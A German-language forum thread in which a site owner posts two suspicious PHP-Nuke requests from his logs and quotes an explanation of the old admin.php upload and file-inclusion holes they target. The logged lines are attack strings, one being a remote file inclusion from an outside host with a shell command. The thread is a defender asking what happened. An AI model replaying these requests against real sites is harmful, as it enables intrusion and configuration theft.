Suche

[heikoandre]

Hallo Allen,

habe Heute bei der durchsicht der Trackingdaten follgendes gefunden:

/admin.php?upload=1&file=config.php&file_name=e xample.txt&wdir=/&userfile=config.php&userfile_name =example.txt

Diese upload und die config.php in der Zeile machen mich etwas nervös, will da jemand an meine Config ran?

Der erste Zugang mit der gleichen IP sah so aus:

/index.php?file=http://www.tsnto.it/html/usdl.g if&cmd=ls

Habe mal nach diesen www.tsnto.it gesucht im Netz und nichts gefunden.

Kann mir jemand schreiben ob dies ein Hackversuch sein könnte?

Gruß Heiko

[heikoandre]

Habe die Antwort gefunden.

Zitat aus dem Forum von Kritikerseiten:

Das sind 2 Sicherheitslöcher in früheren Versionen von Nuke gewesen:

einmal die Upload Funktion in der admin.php, mit der versucht wurde, eine Datei hochzuladen und die config.php damit auszutauschen

und zweitens die file Funktion, mit der man andere Seiten innerhalb von Nuke anzeigen kann und so evtl. an Konfigurationsdaten herankommen kann.

Beide Funktionen existieren aber nicht mehr in der Nuke 5.5 oder höher, also konnte da nichts erreicht werden - früher unter Nuke 5.0/5.2 waren das die beliebten oder vielmehr weniger beliebten Spielchen con Internet-Crash-Kids, die reihenweise Nuke-Seiten so gehackt haben...

zu finden unter: http://www.kritikerseiten.de/forum/viewtopic.php?t=9189

Da gabs das Problem diese Woche schon.